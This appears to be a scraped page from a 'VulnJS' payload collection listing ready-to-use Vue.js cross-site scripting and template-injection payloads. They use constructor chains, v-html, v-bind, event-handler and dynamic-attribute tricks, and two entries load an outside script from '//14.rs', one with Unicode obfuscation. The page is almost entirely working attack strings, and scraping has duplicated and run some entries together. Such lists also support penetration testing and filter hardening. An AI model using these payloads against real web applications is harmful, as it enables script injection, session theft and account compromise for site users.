VulnJS
51 ready-to-use payloads
{{constructor.constructor('alert(1)')()}}
Vue.js XSS — constructor chain prototype injection
{{constructor.constructor('alert(1)')()}}<div v-html="''.constructor.constructor('alert(1)'...
Vue.js XSS — constructor chain prototype injection
<div v-html="''.constructor.constructor('alert(1)')()">a</div><x v-html=_c.constructor('alert(1)')()>
Vue.js XSS — v-html directive injection
<x v-html=_c.constructor('alert(1)')()><x v-if=_c.constructor('alert(1)')()>
Vue.js XSS — v-if directive injection
<x v-if=_c.constructor('alert(1)')()>{{_c.constructor('alert(1)')()}}
Vue.js XSS via template injection
{{_c.constructor('alert(1)')()}}{{_v.constructor('alert(1)')()}}
Vue.js XSS via template injection
{{_v.constructor('alert(1)')()}}{{_s.constructor('alert(1)')()}}
Vue.js XSS via template injection
{{_s.constructor('alert(1)')()}}<p v-show="_c.constructor`alert(1)`()">
Vue.js XSS — v-show directive injection
<p v-show="_c.constructor`alert(1)`()">
<x v-on:click='_b.constructor`alert(1)`()'>click</x>
Vue.js XSS — click event handler injection
<x v-on:click='_b.constructor`alert(1)`()'>click</x>
<x v-bind:a='_b.constructor`alert(1)`()'>
Vue.js XSS — v-bind attribute injection
<x v-bind:a='_b.constructor`alert(1)`()'>
<x @[_b.constructor`alert(1)`()]>
Vue.js XSS via template injection
<x @[_b.constructor`alert(1)`()]>
<x :[_b.constructor`alert(1)`()]>
Vue.js XSS via template injection
<x :[_b.constructor`alert(1)`()]>
<p v-=_c.constructor`alert(1)`()>
Vue.js XSS via template injection
<p v-=_c.constructor`alert(1)`()>
<x #[_c.constructor`alert(1)`()]>
Vue.js XSS via template injection
<x #[_c.constructor`alert(1)`()]>
<p :=_c.constructor`alert(1)`()>
Vue.js XSS via template injection
<p :=_c.constructor`alert(1)`()>
{{_c.constructor('alert(1)')()}}
Vue.js XSS via template injection
{{_c.constructor('alert(1)')()}}{{_b.constructor`alert(1)`()}}
Vue.js XSS via template injection
{{_b.constructor`alert(1)`()}}<x v-bind:is="'script'" src="//14.rs" />
Vue.js XSS — v-bind attribute injection
<x v-bind:is="'script'" src="//14.rs" />
<x is=script src=//⑭.₨>
Vue.js XSS via template injection
<x is=script src=//⑭.₨>
<x @click='_b.constructor`alert(1)`()'>click</x>
Vue.js XSS — click event handler injection
<x @click='_b.constructor`alert(1)`()'>click</x>
<x @[_b.constructor`alert(1)`()]>
Vue.js XSS via template injection
<x @[_b.constructor`alert(1)`()]>
<x :[_b.constructor`alert(1)`()]>
Vue.js XSS via template injection
<x :[_b.constructor`alert(1)`()]>
<x #[_c.constructor`alert(1)`()]>
Vue.js XSS via template injection
<x #[_c.constructor`alert(1)`()]>
<x title"=<iframe	onload	=alert(1)>">
Vue.js XSS via template injection
<x title"=<iframe	onload	=alert(1)>">
<x title"=<iframe	onload	=setTimeout(/a...
Vue.js XSS via template injection
<x title"=<iframe	onload	=setTimeout(/alert(1)/.source)>">